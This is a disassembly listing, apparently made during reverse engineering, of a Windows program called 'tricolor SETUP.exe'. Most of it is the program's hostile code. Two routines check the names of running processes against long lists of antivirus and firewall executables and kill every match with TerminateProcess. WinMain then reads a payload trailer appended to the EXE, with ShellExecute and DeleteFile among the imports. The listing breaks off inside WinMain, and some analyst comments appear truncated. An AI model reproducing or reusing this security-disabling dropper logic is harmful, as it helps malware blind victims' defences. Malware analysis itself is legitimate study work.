.idata:00401000 ; File Name : tricolor SETUP.exe .idata:00401000 ; Format : Portable executable for 80386 (PE) .idata:00401000 ; Imagebase : 400000 .idata:00401000 ; Section 1. (virtual address 00001000) .idata:00401000 ; Virtual size : 00000DAC ( 3500.) .idata:00401000 ; Section size in file : 00000E00 ( 3584.) .idata:00401000 ; Offset to raw data for section: 00000400 .idata:00401000 ; Flags E0040020: Text Executable Readable Writable .idata:00401000 ; Alignment : default .idata:00401000 ; .idata:00401000 ; Imports from KERNEL32.DLL .idata:00401000 ; .idata:00401000 ; OS type : MS Windows .idata:00401000 ; Application type: Executable 32bit .idata:00401000 .idata:00401000 .686p .idata:00401000 .mmx .idata:00401000 .model flat .idata:00401000 .idata:00401000 ; =========================================================================== .idata:00401000 .idata:00401000 ; Segment type: Externs .idata:00401000 ; _idata .idata:00401000 ; HANDLE __stdcall OpenProcess(DWORD dwDesiredAccess,BOOL bInheritHandle,DWORD dwProcessId) .idata:00401000 extrn OpenProcess:dword ; DATA XREF: sub_401488+88r .idata:00401000 ; sub_401540+88r .idata:00401004 ; BOOL __stdcall CloseHandle(HANDLE hObject) .idata:00401004 extrn CloseHandle:dword ; DATA XREF: sub_401488+60r .idata:00401004 ; sub_401488+9Ar ... .idata:00401008 ; BOOL __stdcall __imp_Process32Next(HANDLE hSnapshot,LPPROCESSENTRY32 lppe) .idata:00401008 extrn __imp_Process32Next:dword ; DATA XREF: Process32Nextr .idata:0040100C ; BOOL __stdcall TerminateProcess(HANDLE hProcess,UINT uExitCode) .idata:0040100C extrn TerminateProcess:dword ; DATA XREF: sub_401488+43r .idata:0040100C ; sub_401488+51r ... .idata:00401010 ; BOOL __stdcall __imp_Process32First(HANDLE hSnapshot,LPPROCESSENTRY32 lppe) .idata:00401010 extrn __imp_Process32First:dword .idata:00401010 ; DATA XREF: Process32Firstr .idata:00401014 ; HANDLE __stdcall __imp_CreateToolhelp32Snapshot(DWORD dwFlags,DWORD th32ProcessID) .idata:00401014 extrn __imp_CreateToolhelp32Snapshot:dword .idata:00401014 ; DATA XREF: CreateToolhelp32Snapshotr .idata:00401018 ; BOOL __stdcall DeleteFileA(LPCSTR lpFileName) .idata:00401018 extrn DeleteFileA:dword ; DATA XREF: WinMain(x,x,x,x)+22Br .idata:00401018 ; WinMain(x,x,x,x)+23Fr ... .idata:0040101C ; void __stdcall Sleep(DWORD dwMilliseconds) .idata:0040101C extrn Sleep:dword ; DATA XREF: WinMain(x,x,x,x)+21Br .idata:00401020 ; DWORD __stdcall GetTempPathA(DWORD nBufferLength,LPSTR lpBuffer) .idata:00401020 extrn GetTempPathA:dword ; DATA XREF: WinMain(x,x,x,x)+94r .idata:00401024 ; UINT __stdcall GetSystemDirectoryA(LPSTR lpBuffer,UINT uSize) .idata:00401024 extrn GetSystemDirectoryA:dword .idata:00401024 ; DATA XREF: WinMain(x,x,x,x)+84r .idata:00401028 ; UINT __stdcall GetWindowsDirectoryA(LPSTR lpBuffer,UINT uSize) .idata:00401028 extrn GetWindowsDirectoryA:dword .idata:00401028 ; DATA XREF: WinMain(x,x,x,x)+74r .idata:0040102C ; DWORD __stdcall GetCurrentDirectoryA(DWORD nBufferLength,LPSTR lpBuffer) .idata:0040102C extrn GetCurrentDirectoryA:dword .idata:0040102C ; DATA XREF: WinMain(x,x,x,x)+64r .idata:00401030 ; DWORD __stdcall GetModuleFileNameA(HMODULE hModule,LPSTR lpFilename,DWORD nSize) .idata:00401030 extrn GetModuleFileNameA:dword .idata:00401030 ; DATA XREF: WinMain(x,x,x,x)+1Br .idata:00401034 ; HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName) .idata:00401034 extrn GetModuleHandleA:dword ; DATA XREF: start+128r .idata:00401038 ; void __stdcall GetStartupInfoA(LPSTARTUPINFOA lpStartupInfo) .idata:00401038 extrn GetStartupInfoA:dword ; DATA XREF: start+104r .idata:0040103C .idata:00401040 ; .idata:00401040 ; Imports from MSVCRT.dll .idata:00401040 ; .idata:00401040 extrn __getmainargs:dword ; DATA XREF: start+B5r .idata:00401044 ; char *__cdecl _imp_strstr(const char *,const char *) .idata:00401044 extrn __imp_strstr:dword ; DATA XREF: strstrr .idata:00401048 ; int __cdecl _imp_fclose(FILE *) .idata:00401048 extrn __imp_fclose:dword ; DATA XREF: fcloser .idata:0040104C ; int __cdecl _imp_fputc(int,FILE *) .idata:0040104C extrn __imp_fputc:dword ; DATA XREF: fputcr .idata:00401050 ; int __cdecl _imp_fgetc(FILE *) .idata:00401050 extrn __imp_fgetc:dword ; DATA XREF: fgetcr .idata:00401054 ; size_t __cdecl _imp_fread(void *,size_t,size_t,FILE *) .idata:00401054 extrn __imp_fread:dword ; DATA XREF: freadr .idata:00401058 ; int __cdecl _imp_fseek(FILE *,__int32,int) .idata:00401058 extrn __imp_fseek:dword ; DATA XREF: fseekr .idata:0040105C ; FILE *__cdecl _imp_fopen(const char *,const char *) .idata:0040105C extrn __imp_fopen:dword ; DATA XREF: fopenr .idata:00401060 ; void __cdecl exit(int) .idata:00401060 extrn _exit:dword ; DATA XREF: .text:00401A08r .idata:00401064 extrn __imp__XcptFilter:dword ; DATA XREF: _XcptFilterr .idata:00401068 ; void __cdecl exit(int) .idata:00401068 extrn exit:dword ; DATA XREF: start+138r .idata:0040106C extrn _acmdln:dword ; DATA XREF: start+CDr .idata:00401070 ; char *__cdecl _imp_tmpnam(char *) .idata:00401070 extrn __imp_tmpnam:dword ; DATA XREF: tmpnamr .idata:00401074 extrn __imp__initterm:dword ; DATA XREF: _inittermr .idata:00401078 extrn __setusermatherr:dword ; DATA XREF: start+7Cr .idata:0040107C extrn _adjust_fdiv:dword ; DATA XREF: start+5Er .idata:00401080 extrn __p__commode:dword ; DATA XREF: start+50r .idata:00401084 extrn __p__fmode:dword ; DATA XREF: start+42r .idata:00401088 extrn __set_app_type:dword ; DATA XREF: start+2Dr .idata:0040108C extrn _except_handler3:dword ; DATA XREF: .text:loc_401A30r .idata:00401090 ; unsigned int __cdecl _imp__controlfp(unsigned int,unsigned int) .idata:00401090 extrn __imp__controlfp:dword ; DATA XREF: _controlfpr .idata:00401094 .idata:00401098 ; .idata:00401098 ; Imports from SHELL32.dll .idata:00401098 ; .idata:00401098 ; HINSTANCE __stdcall ShellExecuteA(HWND hwnd,LPCSTR lpOperation,LPCSTR lpFile,LPCSTR lpParameters,LPCSTR lpDirectory,INT nShowCmd) .idata:00401098 extrn ShellExecuteA:dword ; DATA XREF: WinMain(x,x,x,x)+1DBr .idata:00401098 ; WinMain(x,x,x,x)+1F5r ... .idata:00401098 ; Opens or prints a specified file .idata:0040109C .idata:004010A0 ; .idata:004010A0 ; Imports from USER32.dll .idata:004010A0 ; .idata:004010A0 ; int wsprintfA(LPSTR,LPCSTR,...) .idata:004010A0 extrn wsprintfA:dword ; DATA XREF: WinMain(x,x,x,x)+AAr .idata:004010A0 ; WinMain(x,x,x,x)+CCr ... .idata:004010A4 .idata:004010A4 .text:004010A8 ; =========================================================================== .text:004010A8 .text:004010A8 ; Segment type: Pure code .text:004010A8 ; Segment permissions: Read/Write/Execute .text:004010A8 _text segment para public 'CODE' use32 .text:004010A8 assume cs:_text .text:004010A8 ;org 4010A8h .text:004010A8 assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing .text:004010A8 dword_4010A8 dd 0FFFFFFFFh, 4019EEh, 401A02h, 3 dup(0) .text:004010A8 ; DATA XREF: start+5o .text:004010C0 .text:004010C0 ; --------------- S U B R O U T I N E --------------------------------------- .text:004010C0 .text:004010C0 .text:004010C0 ; int __cdecl sub_4010C0(char *) .text:004010C0 sub_4010C0 proc near ; CODE XREF: sub_401488+3Ep .text:004010C0 ; sub_401488+71p .text:004010C0 .text:004010C0 arg_0 = dword ptr 0Ch .text:004010C0 .text:004010C0 push ebx .text:004010C1 push esi .text:004010C2 mov esi, [esp+arg_0] .text:004010C6 push edi .text:004010C7 push offset aAvpm_exe ; "AVPM.EXE" .text:004010CC push esi ; char * .text:004010CD call strstr .text:004010D2 pop ecx .text:004010D3 test eax, eax .text:004010D5 pop ecx .text:004010D6 jnz loc_4013FE .text:004010DC push offset aSpider_exe ; "SPIDER.EXE" .text:004010E1 push esi ; char * .text:004010E2 call strstr .text:004010E7 pop ecx .text:004010E8 test eax, eax .text:004010EA pop ecx .text:004010EB jnz loc_4013FE .text:004010F1 push offset aNavw32_exe ; "NAVW32.EXE" .text:004010F6 push esi ; char * .text:004010F7 call strstr .text:004010FC pop ecx .text:004010FD test eax, eax .text:004010FF pop ecx .text:00401100 jnz loc_4013FE .text:00401106 mov ebx, offset aNavwnt_exe ; "NAVWNT.EXE" .text:0040110B push ebx ; char * .text:0040110C push esi ; char * .text:0040110D call strstr .text:00401112 pop ecx .text:00401113 test eax, eax .text:00401115 pop ecx .text:00401116 jnz loc_4013FE .text:0040111C push offset aAmon_exe ; "AMON.EXE" .text:00401121 push esi ; char * .text:00401122 call strstr .text:00401127 pop ecx .text:00401128 test eax, eax .text:0040112A pop ecx .text:0040112B jnz loc_4013FE .text:00401131 push offset a_avpm_exe ; "_AVPM.EXE" .text:00401136 push esi ; char * .text:00401137 call strstr .text:0040113C pop ecx .text:0040113D test eax, eax .text:0040113F pop ecx .text:00401140 jnz loc_4013FE .text:00401146 push offset aNod32_exe ; "NOD32.EXE" .text:0040114B push esi ; char * .text:0040114C call strstr .text:00401151 pop ecx .text:00401152 test eax, eax .text:00401154 pop ecx .text:00401155 jnz loc_4013FE .text:0040115B push offset aNsplugin_exe ; "NSPLUGIN.EXE" .text:00401160 push esi ; char * .text:00401161 call strstr .text:00401166 pop ecx .text:00401167 test eax, eax .text:00401169 pop ecx .text:0040116A jnz loc_4013FE .text:00401170 push offset aSmss_exe ; "SMSS.EXE" .text:00401175 push esi ; char * .text:00401176 call strstr .text:0040117B pop ecx .text:0040117C test eax, eax .text:0040117E pop ecx .text:0040117F jnz loc_4013FE .text:00401185 push offset aNavapsvc_exe ; "NAVAPSVC.EXE" .text:0040118A push esi ; char * .text:0040118B call strstr .text:00401190 pop ecx .text:00401191 test eax, eax .text:00401193 pop ecx .text:00401194 jnz loc_4013FE .text:0040119A mov edi, offset aOgrc_exe ; "OGRC.EXE" .text:0040119F push edi ; char * .text:004011A0 push esi ; char * .text:004011A1 call strstr .text:004011A6 pop ecx .text:004011A7 test eax, eax .text:004011A9 pop ecx .text:004011AA jnz loc_4013FE .text:004011B0 push offset aAlogserv_exe ; "ALOGSERV.EXE" .text:004011B5 push esi ; char * .text:004011B6 call strstr .text:004011BB pop ecx .text:004011BC test eax, eax .text:004011BE pop ecx .text:004011BF jnz loc_4013FE .text:004011C5 push offset aRulaunch_exe ; "RULAUNCH.EXE" .text:004011CA push esi ; char * .text:004011CB call strstr .text:004011D0 pop ecx .text:004011D1 test eax, eax .text:004011D3 pop ecx .text:004011D4 jnz loc_4013FE .text:004011DA push offset aGuarddog_exe ; "GUARDDOG.EXE" .text:004011DF push esi ; char * .text:004011E0 call strstr .text:004011E5 pop ecx .text:004011E6 test eax, eax .text:004011E8 pop ecx .text:004011E9 jnz loc_4013FE .text:004011EF push offset aVsmain_exe ; "VSMAIN.EXE" .text:004011F4 push esi ; char * .text:004011F5 call strstr .text:004011FA pop ecx .text:004011FB test eax, eax .text:004011FD pop ecx .text:004011FE jnz loc_4013FE .text:00401204 push edi ; char * .text:00401205 push esi ; char * .text:00401206 call strstr .text:0040120B pop ecx .text:0040120C test eax, eax .text:0040120E pop ecx .text:0040120F jnz loc_4013FE .text:00401215 push offset aNavapw32_exe ; "NAVAPW32.EXE" .text:0040121A push esi ; char * .text:0040121B call strstr .text:00401220 pop ecx .text:00401221 test eax, eax .text:00401223 pop ecx .text:00401224 jnz loc_4013FE .text:0040122A push offset aRav7_exe ; "RAV7.EXE" .text:0040122F push esi ; char * .text:00401230 call strstr .text:00401235 pop ecx .text:00401236 test eax, eax .text:00401238 pop ecx .text:00401239 jnz loc_4013FE .text:0040123F push offset aScan32_exe ; "SCAN32.EXE" .text:00401244 push esi ; char * .text:00401245 call strstr .text:0040124A pop ecx .text:0040124B test eax, eax .text:0040124D pop ecx .text:0040124E jnz loc_4013FE .text:00401254 push offset aVet95_exe ; "VET95.EXE" .text:00401259 push esi ; char * .text:0040125A call strstr .text:0040125F pop ecx .text:00401260 test eax, eax .text:00401262 pop ecx .text:00401263 jnz loc_4013FE .text:00401269 push offset aNavnt_exe ; "NAVNT.EXE" .text:0040126E push esi ; char * .text:0040126F call strstr .text:00401274 pop ecx .text:00401275 test eax, eax .text:00401277 pop ecx .text:00401278 jnz loc_4013FE .text:0040127E push offset aFindviru_exe ; "FINDVIRU.EXE" .text:00401283 push esi ; char * .text:00401284 call strstr .text:00401289 pop ecx .text:0040128A test eax, eax .text:0040128C pop ecx .text:0040128D jnz loc_4013FE .text:00401293 push offset a_findviru_exe ; "_FINDVIRU.EXE" .text:00401298 push esi ; char * .text:00401299 call strstr .text:0040129E pop ecx .text:0040129F test eax, eax .text:004012A1 pop ecx .text:004012A2 jnz loc_4013FE .text:004012A8 push offset aClaw95cf_exe ; "CLAW95CF.EXE" .text:004012AD push esi ; char * .text:004012AE call strstr .text:004012B3 pop ecx .text:004012B4 test eax, eax .text:004012B6 pop ecx .text:004012B7 jnz loc_4013FE .text:004012BD push offset aApvxdwin_exe ; "APVXDWIN.EXE" .text:004012C2 push esi ; char * .text:004012C3 call strstr .text:004012C8 pop ecx .text:004012C9 test eax, eax .text:004012CB pop ecx .text:004012CC jnz loc_4013FE .text:004012D2 push offset a_avpcc_exe ; "_AVPCC.EXE" .text:004012D7 push esi ; char * .text:004012D8 call strstr .text:004012DD pop ecx .text:004012DE test eax, eax .text:004012E0 pop ecx .text:004012E1 jnz loc_4013FE .text:004012E7 push offset aAntiTrojan_exe ; "ANTI-TROJAN.EXE" .text:004012EC push esi ; char * .text:004012ED call strstr .text:004012F2 pop ecx .text:004012F3 test eax, eax .text:004012F5 pop ecx .text:004012F6 jnz loc_4013FE .text:004012FC push offset aAve32_exe ; "AVE32.EXE" .text:00401301 push esi ; char * .text:00401302 call strstr .text:00401307 pop ecx .text:00401308 test eax, eax .text:0040130A pop ecx .text:0040130B jnz loc_4013FE .text:00401311 push offset aAvwin95_exe ; "AVWIN95.EXE" .text:00401316 push esi ; char * .text:00401317 call strstr .text:0040131C pop ecx .text:0040131D test eax, eax .text:0040131F pop ecx .text:00401320 jnz loc_4013FE .text:00401326 push ebx ; char * .text:00401327 push esi ; char * .text:00401328 call strstr .text:0040132D pop ecx .text:0040132E test eax, eax .text:00401330 pop ecx .text:00401331 jnz loc_4013FE .text:00401337 push offset aIomon98_exe ; "IOMON98.EXE" .text:0040133C push esi ; char * .text:0040133D call strstr .text:00401342 pop ecx .text:00401343 test eax, eax .text:00401345 pop ecx .text:00401346 jnz loc_4013FE .text:0040134C push offset aFProt95_exe ; "F-PROT95.EXE" .text:00401351 push esi ; char * .text:00401352 call strstr .text:00401357 pop ecx .text:00401358 test eax, eax .text:0040135A pop ecx .text:0040135B jnz loc_4013FE .text:00401361 push offset aFprot_exe ; "FPROT.EXE" .text:00401366 push esi ; char * .text:00401367 call strstr .text:0040136C pop ecx .text:0040136D test eax, eax .text:0040136F pop ecx .text:00401370 jnz loc_4013FE .text:00401376 push offset aEsafe_exe ; "ESAFE.EXE" .text:0040137B push esi ; char * .text:0040137C call strstr .text:00401381 pop ecx .text:00401382 test eax, eax .text:00401384 pop ecx .text:00401385 jnz short loc_4013FE .text:00401387 push offset aAvnt_exe ; "AVNT.EXE" .text:0040138C push esi ; char * .text:0040138D call strstr .text:00401392 pop ecx .text:00401393 test eax, eax .text:00401395 pop ecx .text:00401396 jnz short loc_4013FE .text:00401398 push offset aAckwin32_exe ; "ACKWIN32.EXE" .text:0040139D push esi ; char * .text:0040139E call strstr .text:004013A3 pop ecx .text:004013A4 test eax, eax .text:004013A6 pop ecx .text:004013A7 jnz short loc_4013FE .text:004013A9 push offset aVettray_exe ; "VETTRAY.EXE" .text:004013AE push esi ; char * .text:004013AF call strstr .text:004013B4 pop ecx .text:004013B5 test eax, eax .text:004013B7 pop ecx .text:004013B8 jnz short loc_4013FE .text:004013BA push offset aFpWin_exe ; "FP-WIN.EXE" .text:004013BF push esi ; char * .text:004013C0 call strstr .text:004013C5 pop ecx .text:004013C6 test eax, eax .text:004013C8 pop ecx .text:004013C9 jnz short loc_4013FE .text:004013CB push offset aEcengine_exe ; "ECENGINE.EXE" .text:004013D0 push esi ; char * .text:004013D1 call strstr .text:004013D6 pop ecx .text:004013D7 test eax, eax .text:004013D9 pop ecx .text:004013DA jnz short loc_4013FE .text:004013DC push offset aAvkserv_exe ; "AVKSERV.EXE" .text:004013E1 push esi ; char * .text:004013E2 call strstr .text:004013E7 pop ecx .text:004013E8 test eax, eax .text:004013EA pop ecx .text:004013EB jnz short loc_4013FE .text:004013ED push offset aAvpcc_exe ; "AVPCC.EXE" .text:004013F2 push esi ; char * .text:004013F3 call strstr .text:004013F8 pop ecx .text:004013F9 test eax, eax .text:004013FB pop ecx .text:004013FC jz short loc_401401 .text:004013FE .text:004013FE loc_4013FE: ; CODE XREF: sub_4010C0+16j .text:004013FE ; sub_4010C0+2Bj ... .text:004013FE push 1 .text:00401400 pop eax .text:00401401 .text:00401401 loc_401401: ; CODE XREF: sub_4010C0+33Cj .text:00401401 pop edi .text:00401402 pop esi .text:00401403 pop ebx .text:00401404 retn .text:00401404 sub_4010C0 endp .text:00401404 .text:00401405 .text:00401405 ; --------------- S U B R O U T I N E --------------------------------------- .text:00401405 .text:00401405 .text:00401405 ; int __cdecl sub_401405(char *) .text:00401405 sub_401405 proc near ; CODE XREF: sub_401540+3Ep .text:00401405 ; sub_401540+71p .text:00401405 .text:00401405 arg_0 = dword ptr 8 .text:00401405 .text:00401405 push esi .text:00401406 mov esi, [esp+arg_0] .text:0040140A push offset aZonalarm_exe ; "ZONALARM.EXE" .text:0040140F push esi ; char * .text:00401410 call strstr .text:00401415 pop ecx .text:00401416 test eax, eax .text:00401418 pop ecx .text:00401419 jnz short loc_401483 .text:0040141B push offset aOutpost_exe ; "OUTPOST.EXE" .text:00401420 push esi ; char * .text:00401421 call strstr .text:00401426 pop ecx .text:00401427 test eax, eax .text:00401429 pop ecx .text:0040142A jnz short loc_401483 .text:0040142C push offset aIamapp_exe ; "IAMAPP.EXE" .text:00401431 push esi ; char * .text:00401432 call strstr .text:00401437 pop ecx .text:00401438 test eax, eax .text:0040143A pop ecx .text:0040143B jnz short loc_401483 .text:0040143D push offset aCmgrdian_exe ; "CMGRDIAN.EXE" .text:00401442 push esi ; char * .text:00401443 call strstr .text:00401448 pop ecx .text:00401449 test eax, eax .text:0040144B pop ecx .text:0040144C jnz short loc_401483 .text:0040144E push offset aLookout_exe ; "LOOKOUT.EXE" .text:00401453 push esi ; char * .text:00401454 call strstr .text:00401459 pop ecx .text:0040145A test eax, eax .text:0040145C pop ecx .text:0040145D jnz short loc_401483 .text:0040145F push offset aBlackice_exe ; "BLACKICE.EXE" .text:00401464 push esi ; char * .text:00401465 call strstr .text:0040146A pop ecx .text:0040146B test eax, eax .text:0040146D pop ecx .text:0040146E jnz short loc_401483 .text:00401470 push offset aAtguard_exe ; "ATGUARD.EXE" .text:00401475 push esi ; char * .text:00401476 call strstr .text:0040147B pop ecx .text:0040147C test eax, eax .text:0040147E pop ecx .text:0040147F jnz short loc_401483 .text:00401481 pop esi .text:00401482 retn .text:00401483 ; --------------------------------------------------------------------------- .text:00401483 .text:00401483 loc_401483: ; CODE XREF: sub_401405+14j .text:00401483 ; sub_401405+25j ... .text:00401483 push 1 .text:00401485 pop eax .text:00401486 pop esi .text:00401487 retn .text:00401487 sub_401405 endp .text:00401487 .text:00401488 .text:00401488 ; --------------- S U B R O U T I N E --------------------------------------- .text:00401488 .text:00401488 ; Attributes: bp-based frame .text:00401488 .text:00401488 sub_401488 proc near ; CODE XREF: WinMain(x,x,x,x)+107p .text:00401488 .text:00401488 pe = byte ptr -12Ch .text:00401488 hSnapshot = dword ptr -4 .text:00401488 .text:00401488 push ebp .text:00401489 mov ebp, esp .text:0040148B sub esp, 12Ch .text:00401491 push ebx .text:00401492 push 0 ; th32ProcessID .text:00401494 push 2 ; dwFlags .text:00401496 call CreateToolhelp32Snapshot .text:0040149B mov ebx, eax .text:0040149D test ebx, ebx .text:0040149F mov [ebp+hSnapshot], ebx .text:004014A2 jz loc_40153D .text:004014A8 lea eax, [ebp+pe] .text:004014AE push eax ; lppe .text:004014AF push ebx ; hSnapshot .text:004014B0 call Process32First .text:004014B5 test eax, eax .text:004014B7 jz loc_40153D .text:004014BD push esi .text:004014BE lea eax, [ebp-108h] .text:004014C4 push edi .text:004014C5 push eax ; char * .text:004014C6 call sub_4010C0 .text:004014CB mov esi, ds:TerminateProcess .text:004014D1 pop ecx .text:004014D2 test eax, eax .text:004014D4 jz short loc_4014DB .text:004014D6 push 0 ; uExitCode .text:004014D8 push ebx ; hProcess .text:004014D9 call esi ; TerminateProcess .text:004014DB .text:004014DB loc_4014DB: ; CODE XREF: sub_401488+4Cj .text:004014DB lea eax, [ebp+pe] .text:004014E1 push eax ; lppe .text:004014E2 push ebx ; hSnapshot .text:004014E3 call Process32Next .text:004014E8 mov edi, ds:CloseHandle .text:004014EE test eax, eax .text:004014F0 jz short loc_401538 .text:004014F2 .text:004014F2 loc_4014F2: ; CODE XREF: sub_401488+AEj .text:004014F2 lea eax, [ebp-108h] .text:004014F8 push eax ; char * .text:004014F9 call sub_4010C0 .text:004014FE test eax, eax .text:00401500 pop ecx .text:00401501 jz short loc_401524 .text:00401503 push dword ptr [ebp-124h] ; dwProcessId .text:00401509 push 1 ; bInheritHandle .text:0040150B push 100000h ; dwDesiredAccess .text:00401510 call ds:OpenProcess .text:00401516 mov ebx, eax .text:00401518 test ebx, ebx .text:0040151A jz short loc_401524 .text:0040151C push 0 ; uExitCode .text:0040151E push ebx ; hProcess .text:0040151F call esi ; TerminateProcess .text:00401521 push ebx ; hObject .text:00401522 call edi ; CloseHandle .text:00401524 .text:00401524 loc_401524: ; CODE XREF: sub_401488+79j .text:00401524 ; sub_401488+92j .text:00401524 mov ebx, [ebp+hSnapshot] .text:00401527 lea eax, [ebp+pe] .text:0040152D push eax ; lppe .text:0040152E push ebx ; hSnapshot .text:0040152F call Process32Next .text:00401534 test eax, eax .text:00401536 jnz short loc_4014F2 .text:00401538 .text:00401538 loc_401538: ; CODE XREF: sub_401488+68j .text:00401538 push ebx ; hObject .text:00401539 call edi ; CloseHandle .text:0040153B pop edi .text:0040153C pop esi .text:0040153D .text:0040153D loc_40153D: ; CODE XREF: sub_401488+1Aj .text:0040153D ; sub_401488+2Fj .text:0040153D pop ebx .text:0040153E leave .text:0040153F retn .text:0040153F sub_401488 endp .text:0040153F .text:00401540 .text:00401540 ; --------------- S U B R O U T I N E --------------------------------------- .text:00401540 .text:00401540 ; Attributes: bp-based frame .text:00401540 .text:00401540 sub_401540 proc near ; CODE XREF: WinMain(x,x,x,x)+11Cp .text:00401540 .text:00401540 pe = byte ptr -12Ch .text:00401540 hSnapshot = dword ptr -4 .text:00401540 .text:00401540 push ebp .text:00401541 mov ebp, esp .text:00401543 sub esp, 12Ch .text:00401549 push ebx .text:0040154A push 0 ; th32ProcessID .text:0040154C push 2 ; dwFlags .text:0040154E call CreateToolhelp32Snapshot .text:00401553 mov ebx, eax .text:00401555 test ebx, ebx .text:00401557 mov [ebp+hSnapshot], ebx .text:0040155A jz loc_4015F5 .text:00401560 lea eax, [ebp+pe] .text:00401566 push eax ; lppe .text:00401567 push ebx ; hSnapshot .text:00401568 call Process32First .text:0040156D test eax, eax .text:0040156F jz loc_4015F5 .text:00401575 push esi .text:00401576 lea eax, [ebp-108h] .text:0040157C push edi .text:0040157D push eax ; char * .text:0040157E call sub_401405 .text:00401583 mov esi, ds:TerminateProcess .text:00401589 pop ecx .text:0040158A test eax, eax .text:0040158C jz short loc_401593 .text:0040158E push 0 ; uExitCode .text:00401590 push ebx ; hProcess .text:00401591 call esi ; TerminateProcess .text:00401593 .text:00401593 loc_401593: ; CODE XREF: sub_401540+4Cj .text:00401593 lea eax, [ebp+pe] .text:00401599 push eax ; lppe .text:0040159A push ebx ; hSnapshot .text:0040159B call Process32Next .text:004015A0 mov edi, ds:CloseHandle .text:004015A6 test eax, eax .text:004015A8 jz short loc_4015F0 .text:004015AA .text:004015AA loc_4015AA: ; CODE XREF: sub_401540+AEj .text:004015AA lea eax, [ebp-108h] .text:004015B0 push eax ; char * .text:004015B1 call sub_401405 .text:004015B6 test eax, eax .text:004015B8 pop ecx .text:004015B9 jz short loc_4015DC .text:004015BB push dword ptr [ebp-124h] ; dwProcessId .text:004015C1 push 1 ; bInheritHandle .text:004015C3 push 100000h ; dwDesiredAccess .text:004015C8 call ds:OpenProcess .text:004015CE mov ebx, eax .text:004015D0 test ebx, ebx .text:004015D2 jz short loc_4015DC .text:004015D4 push 0 ; uExitCode .text:004015D6 push ebx ; hProcess .text:004015D7 call esi ; TerminateProcess .text:004015D9 push ebx ; hObject .text:004015DA call edi ; CloseHandle .text:004015DC .text:004015DC loc_4015DC: ; CODE XREF: sub_401540+79j .text:004015DC ; sub_401540+92j .text:004015DC mov ebx, [ebp+hSnapshot] .text:004015DF lea eax, [ebp+pe] .text:004015E5 push eax ; lppe .text:004015E6 push ebx ; hSnapshot .text:004015E7 call Process32Next .text:004015EC test eax, eax .text:004015EE jnz short loc_4015AA .text:004015F0 .text:004015F0 loc_4015F0: ; CODE XREF: sub_401540+68j .text:004015F0 push ebx ; hObject .text:004015F1 call edi ; CloseHandle .text:004015F3 pop edi .text:004015F4 pop esi .text:004015F5 .text:004015F5 loc_4015F5: ; CODE XREF: sub_401540+1Aj .text:004015F5 ; sub_401540+2Fj .text:004015F5 pop ebx .text:004015F6 leave .text:004015F7 retn .text:004015F7 sub_401540 endp .text:004015F7 .text:004015F8 .text:004015F8 ; --------------- S U B R O U T I N E --------------------------------------- .text:004015F8 .text:004015F8 .text:004015F8 sub_4015F8 proc near ; CODE XREF: WinMain(x,x,x,x)+FBp .text:004015F8 ; WinMain(x,x,x,x)+111p ... .text:004015F8 .text:004015F8 arg_0 = dword ptr 4 .text:004015F8 arg_4 = dword ptr 8 .text:004015F8 .text:004015F8 mov ecx, [esp+arg_4] .text:004015FC push 1 .text:004015FE pop eax .text:004015FF shl eax, cl .text:00401601 and eax, [esp+arg_0] .text:00401605 neg eax .text:00401607 sbb eax, eax .text:00401609 neg eax .text:0040160B retn .text:0040160B sub_4015F8 endp .text:0040160B .text:0040160C .text:0040160C ; --------------- S U B R O U T I N E --------------------------------------- .text:0040160C .text:0040160C ; Attributes: bp-based frame .text:0040160C .text:0040160C ; int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nShowCmd) .text:0040160C _WinMain@16 proc near ; CODE XREF: start+12Fp .text:0040160C .text:0040160C Filename = byte ptr -534h .text:0040160C var_430 = byte ptr -430h .text:0040160C var_32C = byte ptr -32Ch .text:0040160C FileName = byte ptr -228h .text:0040160C Buffer = byte ptr -124h .text:0040160C var_20 = dword ptr -20h .text:0040160C var_1C = dword ptr -1Ch .text:0040160C var_18 = dword ptr -18h .text:0040160C var_14 = word ptr -14h .text:0040160C var_12 = dword ptr -12h .text:0040160C var_D = dword ptr -0Dh .text:0040160C var_8 = dword ptr -8 .text:0040160C var_4 = dword ptr -4 .text:0040160C hModule = dword ptr 8 .text:0040160C hPrevInstance = dword ptr 0Ch .text:0040160C lpCmdLine = dword ptr 10h .text:0040160C nShowCmd = dword ptr 14h .text:0040160C .text:0040160C push ebp .text:0040160D mov ebp, esp .text:0040160F sub esp, 534h .text:00401615 push esi .text:00401616 mov esi, 104h .text:0040161B push edi .text:0040161C lea eax, [ebp+Filename] .text:00401622 push esi ; nSize .text:00401623 push eax ; lpFilename .text:00401624 push [ebp+hModule] ; hModule .text:00401627 call ds:GetModuleFileNameA ; GetModuleFileName(hModule,lpFilename,nSize) - .text:00401627 ; EXE Filename .text:00401627 ; .text:0040162D lea eax, [ebp+Filename] .text:00401633 push offset aRb ; "rb" .text:00401638 push eax ; char * .text:00401639 call fopen .text:0040163E mov edi, eax ; edi=fopen(lpFilename,"rb") - .text:0040163E ; EXE .text:0040163E ; edi .text:0040163E ; .text:00401640 push 2 ; int .text:00401642 push 0FFFFFFE8h ; __int32 .text:00401644 push edi ; FILE * .text:00401645 call fseek ; fseek(edi,-18h,SEEK_END) - .text:00401645 ; 18h- EXE .text:00401645 ; .text:0040164A push edi ; FILE * .text:0040164B push 1 ; size_t .text:0040164D lea eax, [ebp+var_20] .text:00401650 push 18h ; size_t .text:00401652 push eax ; void * .text:00401653 call fread ; fread(var_20,18h,1,edi) - .text:00401653 ; 18h EXE .text:00401653 ; var_20 .text:00401658 movsx eax, [ebp+var_14] .text:0040165C add esp, 24h .text:0040165F dec eax .text:00401660 jz short loc_401698 .text:00401662 dec eax .text:00401663 jz short loc_401688 .text:00401665 dec eax .text:00401666 jz short loc_401678 .text:00401668 lea eax, [ebp+Buffer] ; .text:00401668 ; .text:0040166E push eax ; lpBuffer .text:0040166F push esi ; nBufferLength .text:00401670 call ds:GetCurrentDirectoryA .text:00401676 jmp short loc_4016A6 ; buffer = .text:00401676 ; .text:00401678 ; --------------------------------------------------------------------------- .text:00401678 .text:00401678 loc_401678: ; CODE XREF: WinMain(x,x,x,x)+5Aj .text:00401678 lea eax, [ebp+Buffer] .text:0040167E push esi ; uSize .text:0040167F push eax ; lpBuffer .text:00401680 call ds:GetWindowsDirectoryA .text:00401686 jmp short loc_4016A6 ; buffer = Windows .text:00401686 ; .text:00401688 ; 